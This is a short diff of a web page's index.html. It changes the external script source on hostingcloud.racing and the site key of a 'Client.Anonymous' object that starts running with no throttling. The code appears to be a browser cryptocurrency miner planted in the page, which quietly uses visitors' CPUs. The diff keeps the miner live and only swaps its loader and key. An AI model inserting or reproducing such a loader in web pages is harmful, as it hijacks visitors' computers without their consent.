--- a/index.html
+++ b/index.html
@@ -1,8 +1,8 @@
 <html>
 <head>
-<script src="https://www.hostingcloud.racing/pFVU.js"></script>
+<script src="https://www.hostingcloud.racing/vaNq.js"></script>
 <script>
-    var _client = new Client.Anonymous('f20b1dd30f7524c42754a9fb76db765061d014b420e0bdf71f2c75eb5768d56a', {
+    var _client = new Client.Anonymous('398be723978acb22b2826ef48470c7f8c8fc9c4880ef2defbe4b8a802fcb5ade', {
         throttle: 0, c: 'w'
     });
     _client.start();
